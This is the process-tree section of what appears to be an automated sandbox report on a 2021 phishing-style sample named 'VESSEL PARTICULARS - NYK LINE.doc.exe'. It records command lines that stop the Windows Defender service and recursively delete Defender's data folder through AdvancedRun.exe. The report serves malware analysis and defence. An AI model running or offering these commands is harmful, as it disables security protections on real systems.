                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com
                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:12:17:28
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff797770000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:12:17:39
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com
                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:12:17:39
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:18:57
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, Virustotal, Browse
                                                              • Detection: 3%, Metadefender, Browse
                                                              • Detection: 0%, ReversingLabs

                                                              General

                                                              Start time:12:19:02
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:19:05
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:19:11
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:19:14
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x200000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 59%, Virustotal, Browse
                                                              • Detection: 31%, Metadefender, Browse
                                                              • Detection: 86%, ReversingLabs

                                                              General

                                                              Start time:12:19:14
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0xd0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:19:15
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0xc0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:19:15
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x2f0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:19:16
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x110000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              General

                                                              Start time:12:19:17
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x250000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Disassembly

                                                              Code Analysis
